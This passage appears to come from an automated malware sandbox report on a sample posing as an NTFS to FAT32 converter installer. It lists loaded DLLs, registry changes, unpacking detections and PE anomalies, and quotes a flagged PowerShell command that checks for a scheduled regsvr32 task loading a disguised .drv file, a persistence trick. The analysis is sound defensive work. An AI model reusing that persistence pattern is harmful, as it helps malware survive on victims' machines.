                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: winmm.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: msimg32.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: oledlg.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: wsock32.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: httpapi.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: wininet.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: webio.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dll
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dll
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dll
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{76A64158-CB41-11D1-8B02-00600806D9B6}\InProcServer32Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpWindow found: window name: TMainFormJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NTFS to FAT32 Converter_is1Jump to behavior
                    Source: nK8noQeiXl.exeStatic file information: File size 8422912 > 1048576
                    Source: nK8noQeiXl.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x7a2800

                    Data Obfuscation

                    barindex
                    Detected unpacking (changes PE section rights)
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeUnpacked PE file: 5.2.ntfs2fat32converter102.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.ecert5:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                    Detected unpacking (creates a PE file in dynamic memory)
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeUnpacked PE file: 0.2.nK8noQeiXl.exe.3430000.0.unpack
                    Detected unpacking (overwrites its own PE header)
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeUnpacked PE file: 5.2.ntfs2fat32converter102.exe.400000.0.unpack
                    Suspicious powershell command line found
                    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }"
                    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }"
                    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }"Jump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_004502AC GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_004502AC
                    Source: _RegDLL.tmp.4.drStatic PE information: real checksum: 0x0 should be: 0xc2b7
                    Source: DrjfIAN86u.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x398b00
                    Source: Qv4wdsLMG.tmp.6.drStatic PE information: real checksum: 0x0 should be: 0x12d621
                    Source: _setup64.tmp.9.drStatic PE information: real checksum: 0x0 should be: 0x8546
                    Source: Qv4wdsLMG.tmp.8.drStatic PE information: real checksum: 0x0 should be: 0x12d621
                    Source: _setup64.tmp.4.drStatic PE information: real checksum: 0x0 should be: 0x8546
                    Source: Qv4wdsLMG.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x27719a
                    Source: UNIQTWO[1].file.1.drStatic PE information: real checksum: 0x0 should be: 0x398b00
                    Source: UNIQ[1].file.1.drStatic PE information: real checksum: 0xb3346 should be: 0x8aea9d
                    Source: is-AJ5Q5.tmp.4.drStatic PE information: real checksum: 0x0 should be: 0xb2705
                    Source: is-F178L.tmp.4.drStatic PE information: real checksum: 0x0 should be: 0x1b9553
                    Source: vn6ZAuKJ8m7U3.exe.1.drStatic PE information: real checksum: 0xb3346 should be: 0x8aea9d
                    Source: _setup64.tmp.7.drStatic PE information: real checksum: 0x0 should be: 0x8546
                    Source: is-UIRHH.tmp.4.drStatic PE information: real checksum: 0x0 should be: 0x14980c
                    Source: is-LIN1F.tmp.9.drStatic PE information: real checksum: 0x0 should be: 0x12e8da
                    Source: is-4R09J.tmp.9.drStatic PE information: real checksum: 0x85bbf4 should be: 0x860013
                    Source: UNIQTHREE[1].file.1.drStatic PE information: real checksum: 0x0 should be: 0x27719a
                    Source: DrjfIAN86u.tmp.3.drStatic PE information: real checksum: 0x0 should be: 0xb3a7e
                    Source: _iscrypt.dll.4.drStatic PE information: real checksum: 0x0 should be: 0x89d2
                    Source: ntfs2fat32converter102.exe.4.drStatic PE information: section name: .ecert5
                    Source: is-RFHNE.tmp.4.drStatic PE information: section name: /4
                    Source: is-RFHNE.tmp.4.drStatic PE information: section name: /19
                    Source: is-RFHNE.tmp.4.drStatic PE information: section name: /35
                    Source: is-RFHNE.tmp.4.drStatic PE information: section name: /51
                    Source: is-RFHNE.tmp.4.drStatic PE information: section name: /63
                    Source: is-RFHNE.tmp.4.drStatic PE information: section name: /77
                    Source: is-RFHNE.tmp.4.drStatic PE information: section name: /89
                    Source: is-RFHNE.tmp.4.drStatic PE information: section name: /102
                    Source: is-RFHNE.tmp.4.drStatic PE information: section name: /113
                    Source: is-RFHNE.tmp.4.drStatic PE information: section name: /124
                    Source: NTFS2FAT32Converter.exe.5.drStatic PE information: section name: .ecert5
                    Source: sqlite3.dll.5.drStatic PE information: section name: /4
                    Source: sqlite3.dll.5.drStatic PE information: section name: /19
                    Source: sqlite3.dll.5.drStatic PE information: section name: /35
                    Source: sqlite3.dll.5.drStatic PE information: section name: /51
                    Source: sqlite3.dll.5.drStatic PE information: section name: /63
                    Source: sqlite3.dll.5.drStatic PE information: section name: /77
                    Source: sqlite3.dll.5.drStatic PE information: section name: /89
                    Source: sqlite3.dll.5.drStatic PE information: section name: /102
                    Source: sqlite3.dll.5.drStatic PE information: section name: /113
                    Source: sqlite3.dll.5.drStatic PE information: section name: /124
                    Source: is-4R09J.tmp.9.drStatic PE information: section name: /4
                    Source: is-4R09J.tmp.9.drStatic PE information: section name: /14
                    Source: is-4R09J.tmp.9.drStatic PE information: section name: /29
                    Source: is-4R09J.tmp.9.drStatic PE information: section name: /45
                    Source: is-4R09J.tmp.9.drStatic PE information: section name: /57
                    Source: is-4R09J.tmp.9.drStatic PE information: section name: /71
                    Source: is-4R09J.tmp.9.drStatic PE information: section name: /83
                    Source: is-4R09J.tmp.9.drStatic PE information: section name: /96
                    Source: is-4R09J.tmp.9.drStatic PE information: section name: /107
                    Source: is-4R09J.tmp.9.drStatic PE information: section name: /123
                    Source: is-4R09J.tmp.9.drStatic PE information: section name: /137
                    Source: is-4R09J.tmp.9.drStatic PE information: section name: /153
                    Source: is-4R09J.tmp.9.drStatic PE information: section name: /169
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F4A47C push ecx; mov dword ptr [esp], eax0_2_04F4A480
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F4508C push 0040599Dh; ret 0_2_04F450D5
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F5518C push 00415A78h; ret 0_2_04F551B0
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F52120 push ecx; mov dword ptr [esp], ecx0_2_04F52125
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F462EC push 00406BD8h; ret 0_2_04F46310
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F462B4 push 00406BA0h; ret 0_2_04F462D8
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F45294 push 00405B80h; ret 0_2_04F452B8
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F52264 push 00412B50h; ret 0_2_04F52288
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F47254 push 00407B40h; ret 0_2_04F47278
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F4525C push 00405B48h; ret 0_2_04F45280
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F4637A push 00406C68h; ret 0_2_04F463A0
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F51C94 push 00412580h; ret 0_2_04F51CB8
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F52C9E push 0041358Ch; ret 0_2_04F52CC4
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F55D9E push 0041668Ch; ret 0_2_04F55DC4
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F42D4C push eax; ret 0_2_04F42D88
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F47E56 push 00408744h; ret 0_2_04F47E7C
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F56FC0 push 004178ACh; ret 0_2_04F56FE4
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F50890 push 0041117Ch; ret 0_2_04F508B4
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F50858 push 00411144h; ret 0_2_04F5087C
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F5291C push ecx; mov dword ptr [esp], ecx0_2_04F5291F
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F50AEC push 004113D8h; ret 0_2_04F50B10
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F51A50 push 0041233Ch; ret 0_2_04F51A74
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F50B24 push 00411410h; ret 0_2_04F50B48
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeCode function: 0_2_04F4CB0C push 0040D3FCh; ret 0_2_04F4CB34
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeCode function: 1_2_1000F071 push ecx; ret 1_2_1000F084
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exeCode function: 3_2_004065B8 push 004065F5h; ret 3_2_004065ED
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exeCode function: 3_2_004040B5 push eax; ret 3_2_004040F1
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exeCode function: 3_2_00408104 push ecx; mov dword ptr [esp], eax3_2_00408109
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exeCode function: 3_2_00404185 push 00404391h; ret 3_2_00404389
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exeCode function: 3_2_00404206 push 00404391h; ret 3_2_00404389
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exeCode function: 3_2_0040C218 push eax; ret 3_2_0040C219
                    Source: ntfs2fat32converter102.exe.4.drStatic PE information: section name: .text entropy: 7.7153793231467205
                    Source: is-3S4JD.tmp.4.drStatic PE information: section name: .text entropy: 6.90903234258047
                    Source: NTFS2FAT32Converter.exe.5.drStatic PE information: section name: .text entropy: 7.7153793231467205

                    Persistence and Installation Behavior

                    barindex
                    Contains functionality to infect the boot sector
